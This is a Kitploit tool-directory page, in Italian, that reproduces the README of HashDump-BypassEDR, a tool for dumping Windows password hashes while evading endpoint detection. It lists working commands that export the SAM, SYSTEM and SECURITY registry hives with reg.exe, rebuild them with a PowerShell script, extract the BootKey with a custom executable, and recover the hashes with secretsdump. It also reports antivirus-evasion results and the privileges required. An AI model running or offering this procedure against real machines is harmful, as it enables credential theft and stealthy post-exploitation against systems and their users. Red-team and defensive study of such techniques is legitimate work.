Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
HashDump-BypassEDR — Windows绕过EDR实现DumpHash | Kitploit
Strumenti/GitHubGitHub/aabysszg/hashdump-bypassedr
Password AttacksHash AnalysisIDS/IPS EvasionPost-ExploitationPenetration TestingRed Teaming
GitHubaabysszg/hashdump-bypassedr

HashDump-BypassEDR

Windows绕过EDR实现DumpHash

Vedi Repository
2513222 giorni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

HashDump-BypassEDR

1# Panoramica del progetto

Attraverso l'uso esteso del programma di sistema whitelisted Reg.exe, aggira abilmente i punti di intercettazione dell'antivirus, realizzando l'obiettivo di bypassare l'EDR per effettuare il DumpHash.

In base ai test reali, questo metodo è efficace contro i sistemi Windows, non è difficile da eseguire e ha valore pratico.

Articoli pratici di questo progetto:

  • Come bypassare l'EDR per implementare DumpHash - Blog di AabyssZG
  • Come bypassare l'EDR per implementare DumpHash - Community Cloud di Sicurezza Informatica Nazionale

Dopo la pubblicazione dell'articolo, non ho trovato la stessa idea nelle community nazionali ed estere, e pensavo fosse una novità mondiale. Successivamente, in base ai commenti dei fan, questa idea era già stata condivisa da un esperto all'estero: Dumping LSA secrets: a story about task decorrelation

Il codice sorgente e le Release di questo articolo sono pubblicati su GitHub. Condividere non è facile, se lo trovi utile puoi dare una Star, grazie mille!

2# Passaggi chiave

2.1 Primo passo: esportare il file reg

Sulla macchina target, esegui i comandi per esportare i file .reg

root@kitploit:~
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg

2.2 Secondo passo: ripristinare il binario sulla macchina locale

Scarica i file .reg del primo passo sulla macchina locale ed esegui lo script PowerShell RegReduction.ps1 di questo progetto per ripristinare i file binari

root@kitploit:~
.\RegReduction.ps1

Nota: dopo aver scaricato lo script da GitHub, la codifica predefinita è UTF-8; è necessario modificarla in ANSI (GB2312) tramite il Blocco note per poterlo eseguire correttamente

powershell.png

2.3 Terzo passo: ottenere la BootKey

Esegui l'eseguibile BootKey.exe sulla macchina target; il codice sorgente è il file BootKey.c di questo progetto

root@kitploit:~
BootKey.exe

BootKey.png

Test di evasione dell'antivirus (2026.5.10): www.virustotal.com

Virustotal.png

2.4 Quarto passo: ottenere l'Hash tramite secretsdump

root@kitploit:~
python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

HashOut.png

3# Note sui permessi

Questo articolo prevede diverse operazioni chiave, ma i passaggi principali sulla macchina target sono due:

  • Utilizzare il comando reg.exe export per esportare il contenuto chiave del registro;
  • Utilizzare BootKey.exe per esportare la BootKey del sistema.

Sono stati effettuati test anche su sistemi diversi, con i seguenti risultati:

  • Nei test reali, su Win10, Win11 e Windows Server 2025, l'esportazione del registro con il comando reg.exe export richiede i privilegi SYSTEM, mentre su Windows Server 2022 e versioni precedenti richiede solo privilegi di amministratore standard (non privilegi SYSTEM). Se dopo aver esportato il registro con reg.exe export il file è di soli 1KB, significa che i privilegi non sono sufficienti.
  • Nei test reali, l'estrazione della BootKey con BootKey.exe non richiede privilegi di amministratore e la maggior parte degli antivirus testati (nessuno di quelli incontrati finora) non lo rileva.

🙏 4# Ringraziamenti a tutti i maestri

Stargazers

Stargazers repo roster for @AabyssZG/HashDump-BypassEDR

Forkers

Forkers repo roster for @AabyssZG/HashDump-BypassEDR

Star History

Star History Chart

Scarica lo strumento